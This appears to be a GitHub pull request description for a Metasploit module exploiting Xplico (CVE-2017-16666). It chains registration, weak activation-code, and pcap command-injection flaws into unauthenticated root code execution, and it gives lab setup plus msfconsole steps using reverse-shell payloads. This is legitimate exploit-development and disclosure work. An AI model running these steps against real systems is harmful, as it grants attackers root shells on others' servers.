Add Xplico Remote Code Execution Module #9206
Xplico? Wow. I used to use that (locally). :D

All yours, @dmohanty-r7.
Release Notes
This PR adds an exploit module for Xplico (CVE-2017-16666). It leverages three vulnerabilities to get unauthenticated remote code execution: an exposed user registration page, a weak randomization algorithm used to generate the activation code, and a command injection in parsing an uploaded pcap. @mmetince covers the vulnerability via blog post: https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666
Tested with reverse_awk and reverse_netcat:
This module exploits a command injection vulnerability in Xplico. An unauthenticated user can register a new account, activate it, and then execute terminal commands in the context of the root user.
Vulnerable Application Installation Steps
Follow the instructions in the "from sourceforge" section at the following URL. Be sure to install version 1.2.0 instead of 1.0.0: at the time of this writing, the installation commands on that page still reference version 1.0.0.
http://wiki.xplico.org/doku.php?id=ubuntu
You may also try the VirtualBox image provided by the Xplico maintainer:
https://sourceforge.net/projects/xplico/files/VirtualBox%20images/
Verification Steps
A successful check of the exploit will look like this:
1. Start msfconsole
2. use exploit/linux/http/securityonion_xplico_exec
3. Set RHOST
4. Set PAYLOAD cmd/unix/reverse_awk
5. Set LHOST
6. exploit
7. Verify that you see "New user successfully registered" in the console.
8. Verify that you see "User successfully activated" in the console.
9. Verify that you see "Successfully authenticated" in the console.
10. Verify that you see "New Case successfully created" in the console.
11. Verify that you see "New Sols successfully created" in the console.
12. Verify that you see "PCAP successfully uploaded. Pcap parser is going to start on server side" in the console.
13. Verify that you see "We are at PCAP decoding phase. Little bit more patience..." in the console.
Scenarios
Technical Details and Demo
https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666/